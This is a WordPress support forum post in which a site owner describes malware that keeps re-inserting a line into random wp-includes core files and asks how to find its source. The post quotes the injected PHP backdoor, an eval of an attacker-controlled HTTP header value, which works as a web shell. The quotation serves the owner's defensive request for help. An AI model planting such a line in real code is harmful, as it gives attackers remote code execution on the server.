Malware repeatedly modifying random core files

  • I’ve had an issue recently across a number of hosted sites where a line is being added to a seemingly random file in the wp-includes directory of the core files.

    The added line is a variation of this: @eval($_SERVER[‘HTTP_52BD9D0’]);

    If I remove it, it reappears. If I replace the entire WP install, the line is added again immediately.

    I can’t find it in a plugin, Wordfence picks up the modification, but not the source. I’m assuming it’s in the database somewhere, but I can’t find where.

    If I comment out that line, it puts the issue on pause – the entry isn’t uncommented, and isn’t added again. I’m assuming, being commented out, that it’s inert, but it’s still a concern.

    Does anyone have any experience with this? Any idea where to find and remove it at the source?

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘Malware repeatedly modifying random core files’ is closed to new replies.

Tags